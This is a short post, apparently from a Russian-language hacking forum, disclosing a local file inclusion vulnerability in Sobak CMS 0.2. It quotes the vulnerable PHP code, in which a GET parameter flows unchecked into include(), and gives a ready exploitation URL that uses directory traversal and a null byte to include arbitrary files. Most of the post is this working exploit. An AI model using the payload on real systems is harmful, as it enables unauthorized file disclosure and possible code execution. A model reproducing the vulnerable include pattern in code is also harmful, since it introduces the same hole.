30.01.2011, 23:06
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Sobak CMS 0_2
Скачате: http://sourceforge.net/projects/sobakcms/
LFI
Need: rg = on ; mq = off
index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$isInWebs[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {
include ([/COLOR][COLOR="#DD0000"]'webs/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][/COLOR]
эксплуатация:
Код:
http://localhost/sobak/index.php?isInWebs=1&id=../robots.txt%00
|
|
|